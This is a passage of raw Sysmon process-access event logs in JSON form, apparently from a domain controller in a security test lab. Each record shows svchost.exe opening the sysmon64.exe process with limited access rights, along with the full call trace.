C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8526,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8527,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8528,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8529,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8530,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8531,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8532,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8533,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 